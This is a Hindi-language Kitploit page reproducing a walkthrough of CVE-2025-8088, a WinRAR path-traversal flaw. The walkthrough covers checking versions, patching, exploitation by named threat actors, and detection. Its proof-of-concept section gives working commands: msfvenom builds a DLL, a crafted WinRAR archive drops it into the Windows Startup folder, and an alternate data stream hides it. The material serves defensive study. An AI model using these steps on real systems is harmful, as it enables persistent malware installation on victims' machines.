Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-8088-WinRAR-Zero-Day-Path-Traversal — CVE-2025-8088 को उजागर करने, पैच करने और सुरक्षित करने पर एक आकर्षक वॉकथ्रू, हैकर के व्यावहारिक ट्विस्ट के साथ। | Kitploit
उपकरण/GitHubGitHub/adityabhatt3010/cve-2025-8088-winrar-zero-day-path-traversal
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणफोरेंसिकमालवेयर विश्लेषणपेनिट्रेशन टेस्टिंगखतरा खुफियालर्निंग और शिक्षाघटना प्रतिक्रिया
GitHubadityabhatt3010/cve-2025-8088-winrar-zero-day-path-traversal

CVE-2025-8088-WinRAR-Zero-Day-Path-Traversal

CVE-2025-8088 को उजागर करने, पैच करने और सुरक्षित करने पर एक आकर्षक वॉकथ्रू, हैकर के व्यावहारिक ट्विस्ट के साथ।

रिपॉजिटरी देखें
12251 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-8088: WinRAR का जीरो-डे पथ ट्रैवर्सल — शून्य से Pwn तक 🗿


परिचय – “पुराना दोस्त” चूकता हुआ पकड़ा गया

WinRAR — वह धूल-पुस्त क्लासिक जो सबने इंस्टॉल किया है लेकिन कोई अपडेट नहीं करता — अभी एक उच्च-गंभीरता का जीरो-डे झेल गया: CVE-2025-8088।

  • गंभीरता: CVSS v3.1 → 8.8 (उच्च)
  • जंगल में शोषित किया गया RomCom (Storm-0978) और Paper Werewolf जैसे खतरे के अभिनेताओं द्वारा।
  • पैच किया गया: WinRAR 7.13 (30 जुलाई 2025 को जारी)।
  • यदि आप 7.12 या उससे नीचे पर हैं — तो आप सीधा निशाना हैं।

CISA ने इसे अपनी ज्ञात शोषित कमजोरियों की सूची में डाल दिया है, जिसमें 2 सितंबर 2025 तक सुधार की समय-सीमा है। यह सिर्फ थ्योरी नहीं है — यह जीती-जागती आग है।

Cover


बग क्या है? 🧩

  • प्रकार: पथ ट्रैवर्सल (डायरेक्टरी ट्रैवर्सल)
  • ट्विस्ट: पेलोड छिपाने के लिए Alternate Data Streams (ADS) का उपयोग करता है
  • प्रभाव: दुर्भावनापूर्ण RAR फ़ाइलें इच्छित फ़ोल्डर के बाहर चीजें निकाल सकती हैं — सोचें: ..\Startup\evil.dll
  • परिणाम: मनमाना फ़ाइल प्लेसमेंट → स्थायित्व → बैकडोर → RAT सिटी।
  • प्रभावित: विंडोज के लिए WinRAR (≤7.12), UnRAR.dll, पोर्टेबल UnRAR सुरक्षित: लिनक्स, यूनिक्स, एंड्रॉइड बिल्ड।


    पहली बात — क्या आप असुरक्षित हैं? 🕵️‍♂️

    घबराने या हैकर बनने से पहले, अपना वर्जन जांचें।

    कैसे जांचें:

    • GUI: WinRAR खोलें → Help → About WinRAR
    • CMD/Powershell:
    root@kitploit:~
    winget list WinRAR
    

    (या अपने इंस्टॉल डायरेक्टरी से winrar.exe चलाएँ)

    • DLL जांच: UnRAR.dll पर राइट-क्लिक करें → Properties → Details।

    जब मैंने यह लिखना शुरू किया, मैं 7.10 पर था — हाँ, पकने के लिए तैयार 🗿🐔🍗।

    WinRAR_Version


    कैसे पैच करें (इससे पहले कि कोई आपको पैच करे) 🛡️

    1. नवीनतम डाउनलोड करें: rarlab.com/download.htm
    2. अपने सिस्टम के अनुसार 64-bit या 32-bit चुनें।
    3. इंस्टॉलर चलाएँ → यह आपके पुराने बिल्ड को ओवरराइट करेगा।
    4. सत्यापित करें: Help → About WinRAR → 7.13 या उससे ऊपर होना चाहिए।
    5. यदि कोई हों तो आश्रित टूल्स में UnRAR.dll बदलें।

    WinRAR ऑटो-अपडेट नहीं करता — एक कैलेंडर रिमाइंडर सेट करें, स्थिर निशाना न बनें।

    WinRAR_Version_Updated

    PS: यहाँ मेरे वॉलपेपर फ्लेक्स को अनदेखा करें — थोड़ा दिखावा करना था! 😏


    जंगल में शोषण ⚔️

    • RomCom (Storm-0978): स्पीयर-फिशिंग नौकरी आवेदन डिकॉय, यूक्रेन से संबंधित लक्ष्य।
    • Paper Werewolf: कुछ ही समय बाद कूद पड़े, रूसी संगठनों को निशाना बनाते हुए।
    • वितरित पेलोड: SnipBot, RustyClaw, Mythic Agent वेरिएंट।
    • %TEMP% और स्टार्टअप फोल्डर में दुर्भावनापूर्ण DLLs/LNKs गिराए।
    • CISA ने इसे 12 अगस्त 2025 को सूचीबद्ध किया → समय-सीमा: 2 सितंबर 2025।

    प्रूफ ऑफ कॉन्सेप्ट (PoC) – केवल नियंत्रित प्रयोगशाला में! 🧨

    ⚠ अस्वीकरण: यह केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण के लिए है। पूरी तरह ग्रेमलिन न बनें 🗿।

    चरण 1: एक दुर्भावनापूर्ण DLL उत्पन्न करें

    root@kitploit:~
    msfvenom -p windows/x64/exec CMD=calc.exe -f dll > evil.dll
    

    चरण 2: एक ट्रैवर्सल RAR तैयार करें

    root@kitploit:~
    winrar a -ep -ap"\\..\\..\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" payload.rar evil.dll
    

    चरण 3: (वैकल्पिक) ADS स्टील्थ

    root@kitploit:~
    type evil.dll > legit.txt:evil.dll
    

    चरण 4: असुरक्षित WinRAR के साथ निकालें

    बूम — evil.dll स्टार्टअप में पहुँच जाता है। अगला रीबूट? हैलो calc.exe।

    Workflow


    शमन और खोज 🐺

    • पैच → WinRAR 7.13+

    • संदिग्ध .dll या .lnk खोजें:

      • %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup
      • %TEMP%
    • ADS पर नजर रखें:

      root@kitploit:~
      streams.exe -s C:\
      
    • IDS/IPS नियम: ..\ अनुक्रम वाले RAR को फ्लैग करें।

    • Nessus/Qualys प्लगइन्स पहले से सक्रिय हैं।


    मुख्य समयरेखा

    • 18 जुलाई 2025 – ESET ने सक्रिय शोषण की खोज की
    • 30 जुलाई 2025 – पैच जारी (7.13)
    • 12 अगस्त 2025 – CISA KEV कैटलॉग में जोड़ा गया
    • 2 सितंबर 2025 – संघीय एजेंसियों के लिए अनिवार्य सुधार समय-सीमा

    अंतिम शब्द – पैच करें या नष्ट हों 🗿

    यह कोई "शायद-एक-दिन" कमजोरी नहीं थी — यह खुलासे से पहले हथियारबंद किया गया था। यदि आप अभी भी 7.10 पर बैठे हैं (जैसा कि मैं यह लिखते समय था), तो अभी पैच करें। यदि आप रेड टीम की तरफ हैं, तो इसे एक केस स्टडी के रूप में देखें कि कैसे पुराने उपकरण नए हमले के वेक्टर बन जाते हैं।


    टूल डाउनलोड करें